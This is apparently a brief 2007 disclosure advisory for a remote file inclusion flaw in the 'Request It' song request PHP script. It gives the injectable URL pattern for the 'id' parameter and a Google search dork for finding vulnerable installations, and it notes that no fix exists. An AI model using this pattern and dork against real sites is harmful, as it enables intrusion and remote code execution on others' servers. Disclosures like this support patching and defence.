Request It 1.0b (index.php id) Remote File Inclusion Vulnerability

2007-04-12 00:00:00

Request It : Song Request System 1.0b - remote file inclusion

Software: Request It : Song Request System
Type: remote file inclusion
Version: 1.0b
Date: 2007-04-09
Url: http://scripts.ringsworld.com/organizers/requestit/
Risc: middle

------------------------------------
Credit:

http://hackberry.ath.cx
mail[AT]hackberry.ath.cx

------------------------------------
Vulnerability:

http://[target]/?id=[REMOTEFILE]

------------------------------------
Google dork:

"[ Request us to play you a song ]"

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.